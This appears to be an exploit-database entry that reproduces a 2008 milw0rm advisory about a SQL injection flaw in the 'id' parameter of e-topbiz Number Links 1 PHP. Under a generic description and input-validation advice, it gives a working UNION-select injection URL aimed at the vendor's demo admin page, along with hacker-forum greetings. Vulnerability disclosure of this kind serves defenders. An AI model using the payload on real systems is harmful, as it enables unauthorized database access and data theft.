e-topbiz Number Links 1 php ( id ) Remote SQL Injection Vulnerability

vendor:

Number Links 1 php

by:

Hussin X

CVSS

HIGH

SQL Injection

CWE

Product Name: Number Links 1 php

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

e-topbiz Number Links 1 php ( id ) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in e-topbiz Number Links 1 php. An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable application in order to manipulate the database. This can be exploited to gain access to sensitive information or to manipulate certain data.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

e-topbiz Number Links 1 php  ( id ) Remote SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com  & www.TrYaG.cc

MaiL : darkangeL_G85@Yahoo.CoM
___________________________________

script    : http://e-topbiz.com/oprema/pages/numberlinks1.php

_____

ExploiT & Demo
______________

http://e-topbiz.com/trafficdemos/numberlinks1/admin/admin_catalog.php?action=edit&id=-2+union+select+concat(user

(),0x3e,version()),2,3,4,5--







____________________________( Greetz )_________________________________
|
|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
|
|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
|_____________________________________________________________________


                   Im IRAQi    |    Im TrYaGi

# milw0rm.com [2008-11-07]